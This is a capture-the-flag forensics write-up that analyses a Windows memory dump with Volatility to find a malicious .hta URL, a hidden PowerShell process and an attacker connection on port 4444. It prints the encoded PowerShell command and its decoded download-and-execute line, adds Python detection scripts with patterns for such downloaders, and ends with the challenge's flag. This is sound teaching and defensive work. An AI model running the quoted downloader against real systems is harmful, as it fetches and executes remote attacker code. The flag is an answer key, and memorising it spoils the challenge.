Forensics / Miscellaneous, +300 points


Honeypot

This challenge gave a file called honeypot.raw. It is a big file (>1 GB), and looking at its first few lines with the head command it looked like it came from a VirtualBox VM. The challenge description asks some specific questions about information to be recovered from this image.

The Challenge

The challenge description asks us to find the following information in the file:

  1. Find the full URL used to download the malware.
  2. Find the malicious process ID.
  3. Find the attacker's IP.

In the end, the flag will be an md5 sum of these values in the following format (with the correct values replaced):
HTB{echo -n "http://url.com/path.foo_PID_127.0.0.1" | md5sum}

Analysing

I wasn't experienced with this type of challenge, so I tried lots of ways to mount this image in my own VirtualBox software. Everything I tried just gave me an error, but eventually I had another idea: this file is just a memory dump of the VM. A lot of information is stored in memory, so we can probably find what we're looking for in there.

Using Volatility we can analyze this memory dump to see what was happening on the VM at the time of the dump. There are two versions of Volatility: the original Volatility 2 (Python 2) and Volatility 3 for Python 3, and their plugin names and options differ. In this blog post I'll be using them interchangeably, so look at the path in front of each command to see which one is being run.

Volatility 2 needs a profile matching the OS version and service pack of the dump before its plugins can walk the kernel structures. Running ./volatility/vol.py -f honeypot.raw imageinfo prints some information about the image, including a few suggested profiles. In this case it suggests Win7SP0x86, so we'll pass that with --profile for the rest of the analysis. (Volatility 3 resolves the symbol table itself and needs no profile.)

1. URL used to download malware

If we look at the process list, we can see two instances of iexplore.exe; PID 3344 was spawned by 3324, the usual frame-process-plus-tab-process pair of Internet Explorer.

Bash

$ /volatility3/vol.py -f honeypot.raw windows.pslist

PID     PPID    ImageFileName   Offset(V)    CreateTime
...
3112    572     WmiPrvSE.exe    0x84b88788   2021-11-25 19:13:24
3324    2856    iexplore.exe    0x84bafc60   2021-11-25 19:13:31
3344    3324    iexplore.exe    0x856aa9b8   2021-11-25 19:13:31
2700    3720    powershell.exe  0x8420dd28   2021-11-25 19:13:50
3732    2616    conhost.exe     0x851733c8   2021-11-25 19:13:50
...

This means the user was likely browsing with Internet Explorer. Volatility 2 has an iehistory plugin that carves Internet Explorer's index.dat cache records out of memory, so we can see which URLs were visited. Running this scan we get a lot of results.

Bash

$ /volatility/vol.py -f honeypot.raw --profile Win7SP0x86 iehistory

...
**************************************************
Process: 3344 iexplore.exe
Cache type "URL " at 0x709d300
Record length: 0x380
Location: https://windowsliveupdater.com/christmas_update.hta
Last modified: 2021-11-25 18:50:07 UTC+0000
Last accessed: 2021-11-25 19:13:50 UTC+0000
File Offset: 0x380, Data Offset: 0x9c, Data Length: 0xb4
File: christmas_update[1].hta
Data: HTTP/1.1 200 OK
Content-Type: application/octet-stream
Content-Length: 464
etag: "619fdadf-1d0"
CF-Cache-Status: DYNAMIC
Expect-CT: max-age=604800, report-uri="https://report-uri.cloudflare.com/cdn-cgi/beacon/expect-ct"
Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v3?s=mY%2BWRDwCloKF%2F%2Bq4Cg80hIVa3cyg%2BLElBu8GpVTYoANDvuEz3kCjllbf5NQAv3a1qODNV83KXbXapLkxIBkDrdQrFnPxDI%2BbpgvUF5ScHJOhnSCUoCQtwQMWQFcMeiu%2B2CI6JtCld2rw"}],"group":"cf-nel","max_age":604800}
NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
CF-RAY: 6b3d32327b806f77-ATH
alt-svc: h3=":443"; ma=86400, h3-29=":443"; ma=86400, h3-28=":443"; ma=86400, h3-27=":443"; ma=86400

~U:santa
...

A few of these entries contain the location https://windowsliveupdater.com/christmas_update.hta (do not visit it). This is a very suspicious link: the domain imitates a Microsoft update service, and a .hta file is an HTML Application, which Windows runs with mshta.exe outside the browser sandbox, so any VBScript or JScript it contains executes with the rights of the user who opened it. Note also that the record's "Last accessed" time, 19:13:50, is the same second at which the powershell.exe process in the process list was created.

This URL was used to download the malware and is part 1 of the puzzle.

2. Malicious process ID

In the windows.pslist output above we also saw a powershell.exe process. That is suspicious on its own, because payloads are frequently launched through PowerShell or cmd.exe, but to rule out a false positive we should look at exactly what it was running. The windows.cmdline plugin shows the command line of every process in the list.

Bash

$ ./volatility3/vol.py -f honeypot.raw windows.cmdline

PID     Process         Args
...
3344    iexplore.exe    "C:\Program Files\Internet Explorer\iexplore.exe"
2700    powershell.exe  "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" /window hidden /e aQBlAHgAIAAoACgAbgBlAHcALQBvAGIAagBlAGMAdAAgAG4AZQB0AC4AdwBlAGIAYwBsAGkAZQBuAHQAKQAuAGQAbwB3AG4AbABvAGEAZABzAHQAcgBpAG4AZwAoACcAaAB0AHQAcABzADoALwAvAHcAaQBuAGQAbwB3AHMAbABpAHYAZQB1AHAAZABhAHQAZQByAC4AYwBvAG0ALwB1AHAAZABhAHQAZQAuAHAAcwAxACcAKQApAA==
3732    conhost.exe     \??\C:\Windows\system32\conhost.exe
...

The /e switch (short for -EncodedCommand) means the argument that follows is the script, base64-encoded as UTF-16LE, and /window hidden (-WindowStyle Hidden) keeps the console window off-screen. Decoding the blob gives the following command:
iex ((new-object net.webclient).downloadstring('https://windowsliveupdater.com/update.ps1'))
This uses iex, the alias of Invoke-Expression, to download a second-stage script from the same windowsliveupdater.com domain and run it straight from memory as PowerShell code, without writing anything to disk. Now we're sure this PowerShell process is malicious, so part 2 is the PID (process ID) of powershell.exe, which is 2700 as seen in the previous scan.
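As an added example (not code from the original write-up), the following Python decodes the /e argument the same way PowerShell does, base64 followed by UTF-16LE, and then runs the checks made above over a windows.cmdline listing: a hidden window, an encoded command, Invoke-Expression and download cmdlets in the decoded script. The listing is a constructed copy of the page's rows plus a benign WmiPrvSE.exe row whose path is assumed; the indicator names and regular expressions are my own choices.

```python
import base64
import re

# The encoded argument exactly as it appears in the page's windows.cmdline
# listing for PID 2700.
ENCODED = (
    "aQBlAHgAIAAoACgAbgBlAHcALQBvAGIAagBlAGMAdAAgAG4AZQB0AC4AdwBlAGIAYwBsAGkAZQBuAHQAKQAuAGQAbwB3AG4AbABvAGEAZABzAHQAcgBpAG4AZwAoACcAaAB0AHQAcABzADoALwAvAHcAaQBuAGQAbwB3AHMAbABpAHYAZQB1AHAAZABhAHQAZQByAC4AYwBvAG0ALwB1AHAAZABhAHQAZQAuAHAAcwAxACcAKQApAA=="
)

# Constructed windows.cmdline excerpt: the page's three rows plus a benign
# WmiPrvSE.exe row (its path is assumed) so the filter has something to skip.
CMDLINE_OUTPUT = (
    "PID     Process         Args\n"
    "3112    WmiPrvSE.exe    C:\\Windows\\system32\\wbem\\wmiprvse.exe\n"
    '3344    iexplore.exe    "C:\\Program Files\\Internet Explorer\\iexplore.exe"\n'
    '2700    powershell.exe  "C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe" '
    "/window hidden /e " + ENCODED + "\n"
    "3732    conhost.exe     \\??\\C:\\Windows\\system32\\conhost.exe\n"
)

URL_RE = re.compile(r"https?://[^\s'\"]+", re.I)
SCRIPT_INDICATORS = [
    ("invoke-expression", re.compile(r"\b(?:iex|invoke-expression)\b", re.I)),
    ("remote download", re.compile(
        r"downloadstring|downloadfile|downloaddata|invoke-webrequest|\biwr\b|start-bitstransfer", re.I)),
    ("url", URL_RE),
]
# -WindowStyle Hidden, or any prefix of it such as -w hidden / /window hidden.
HIDDEN_WINDOW = re.compile(r"[-/]w\S*\s+hidden\b", re.I)


def decode_encoded_command(blob: str) -> str:
    """What powershell.exe does with -EncodedCommand: base64, then UTF-16LE."""
    return base64.b64decode(blob, validate=True).decode("utf-16-le")


def is_encoded_flag(token: str) -> bool:
    """powershell.exe accepts -EncodedCommand and any unambiguous prefix of it
    (-e, -ec, -enc, ...), with '/' accepted in place of '-'."""
    return (len(token) > 1 and token[0] in "-/"
            and "encodedcommand".startswith(token[1:].lower()))


def triage_cmdline(text: str) -> list:
    """Return one record per PowerShell process whose command line shows
    evasion or download indicators, in the order the rows appear."""
    hits = []
    for line in text.splitlines():
        parts = line.split(None, 2)
        if len(parts) < 3 or not parts[0].isdigit():
            continue                                   # header and '...' lines
        pid, process, args = int(parts[0]), parts[1], parts[2]
        if process.lower() not in ("powershell.exe", "pwsh.exe"):
            continue
        indicators, script, urls = [], None, []
        if HIDDEN_WINDOW.search(args):
            indicators.append("hidden window")
        tokens = args.split()
        for i, tok in enumerate(tokens[:-1]):
            if is_encoded_flag(tok):
                try:
                    script = decode_encoded_command(tokens[i + 1])
                except (ValueError, UnicodeDecodeError):
                    script = None                      # garbage after the flag
                break
        if script is not None:
            indicators.append("encoded command")
            for name, pattern in SCRIPT_INDICATORS:
                if pattern.search(script):
                    indicators.append(name)
            urls = URL_RE.findall(script)
        if indicators:
            hits.append({"pid": pid, "process": process, "script": script,
                         "urls": urls, "indicators": indicators})
    return hits


if __name__ == "__main__":
    for hit in triage_cmdline(CMDLINE_OUTPUT):
        print(hit["pid"], hit["process"], ", ".join(hit["indicators"]))
        print("  script:", hit["script"])
        print("  urls:  ", hit["urls"])
```

The prefix matching in is_encoded_flag matters in practice: attackers rarely spell out -EncodedCommand, and a detection that only looks for the literal flag misses -enc and -ec. Decoding is done with validate=True so a truncated or padded blob raises instead of silently producing a mangled script.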

3. Attackers IP

Because we need the attacker's IP address, the network connections are a good place to look; with luck the attacker is still connected to the machine. The netscan plugin scans memory for TCP and UDP endpoint and connection objects and prints output similar to the Windows netstat -ano command.

Bash

$ ./volatility/vol.py -f honeypot.raw --profile Win7SP0x86 netscan

Proto   Local Address     Foreign Address       State
...
TCPv4   0.0.0.0:49156     0.0.0.0:0             LISTENING
TCPv4   10.0.2.15:49229   147.182.172.189:4444  ESTABLISHED
TCPv4   10.0.2.15:49216   212.205.126.106:443   ESTABLISHED
...

There are a few different foreign addresses in this result, but one stands out: 147.182.172.189:4444. Port 4444 is the default listener port (LPORT) of Metasploit payloads, so it is commonly seen for reverse shells. The other established connections go to port 80 or 443, i.e. HTTP and HTTPS traffic, most likely from Internet Explorer. A port number alone is only a heuristic, but here it is an ESTABLISHED outbound connection on a box that is also running a hidden PowerShell downloader, so the attacker's IP address connected to the machine on port 4444 is 147.182.172.189.
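To make the reasoning above repeatable, here is an added Python example (not part of the original write-up) that parses a netscan listing and applies the same filter: only ESTABLISHED connections, ignore the web ports 80 and 443, and flag Metasploit's default port 4444 and any other non-web port on a public address. The listing is a constructed copy of the page's rows with an extra HTTP connection to a documentation-range address and a UDP endpoint added so the filter has benign rows to ignore; the port lists and reason strings are my own.

```python
import ipaddress
import re

# Constructed netscan excerpt: the rows shown on the page plus an HTTP
# connection to a documentation-range address and a UDP endpoint.
NETSCAN_OUTPUT = """\
Proto   Local Address     Foreign Address       State
TCPv4   0.0.0.0:49156     0.0.0.0:0             LISTENING
TCPv4   10.0.2.15:49229   147.182.172.189:4444  ESTABLISHED
TCPv4   10.0.2.15:49216   212.205.126.106:443   ESTABLISHED
TCPv4   10.0.2.15:49231   198.51.100.7:80       ESTABLISHED
UDPv4   10.0.2.15:137     *:*
"""

WEB_PORTS = {80, 443}
# Metasploit's default LPORT; extend with whatever your own tooling or
# threat intel cares about.
SUSPECT_PORTS = {4444}

ENDPOINT = re.compile(r"^(?P<host>.+):(?P<port>\d+|\*)$")


def parse_endpoint(token):
    """'10.0.2.15:49229' -> ('10.0.2.15', 49229); '*:*' -> ('*', None)."""
    m = ENDPOINT.match(token)
    if not m:
        return None
    port = m.group("port")
    return (m.group("host"), None if port == "*" else int(port))


def parse_netscan(text):
    """Locate the two host:port columns instead of relying on fixed positions,
    so the Offset/Pid/Owner columns of the full plugin output do not matter."""
    rows = []
    for line in text.splitlines():
        tokens = line.split()
        endpoints = [(i, ep) for i, ep in
                     ((i, parse_endpoint(t)) for i, t in enumerate(tokens)) if ep]
        if len(endpoints) < 2:
            continue                                   # header or noise line
        (_, local), (j, foreign) = endpoints[:2]
        state = tokens[j + 1] if j + 1 < len(tokens) and tokens[j + 1].isupper() else ""
        proto = next((t for t in tokens if t.upper().startswith(("TCP", "UDP"))), "")
        rows.append({"proto": proto, "local": local, "foreign": foreign, "state": state})
    return rows


def suspicious_connections(rows):
    """Apply the write-up's heuristic and return the flagged rows, strongest first."""
    out = []
    for row in rows:
        host, port = row["foreign"]
        if row["state"] != "ESTABLISHED" or port is None:
            continue
        try:
            addr = ipaddress.ip_address(host)
        except ValueError:
            continue                                   # '*' or a hostname
        reasons = []
        if port in SUSPECT_PORTS:
            reasons.append(f"port {port} is a default reverse-shell port")
        if port not in WEB_PORTS and addr.is_global:
            reasons.append(f"established to a public host on non-web port {port}")
        if reasons:
            out.append({**row, "reasons": reasons})
    out.sort(key=lambda h: len(h["reasons"]), reverse=True)
    return out


def attacker_ip(text):
    """The foreign address of the strongest candidate, or None."""
    hits = suspicious_connections(parse_netscan(text))
    return hits[0]["foreign"][0] if hits else None


if __name__ == "__main__":
    for hit in suspicious_connections(parse_netscan(NETSCAN_OUTPUT)):
        print(hit["proto"], hit["local"], "->", hit["foreign"], "|", "; ".join(hit["reasons"]))
    print("attacker:", attacker_ip(NETSCAN_OUTPUT))
```

The parser deliberately ignores column positions: the same function works on the trimmed listing shown here and on the full Volatility 2 output, which prefixes an Offset column and appends Pid, Owner and Created. Treat the result as a shortlist to confirm against the process tree and timestamps, not as proof on its own.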

Solution

Now that we have found all three parts of the flag, we combine them in the specified format.
First, concatenate the URL, process ID and IP address, separated by underscores:
https://windowsliveupdater.com/christmas_update.hta_2700_147.182.172.189
Then take the MD5 sum of this string (with echo -n, so no trailing newline is hashed), which gives 969b934d7396d043a50a37b70e1e010a. The flag is this hash wrapped in the usual HTB{}. After submitting, we see that this was the right flag!
HTB{969b934d7396d043a50a37b70e1e010a}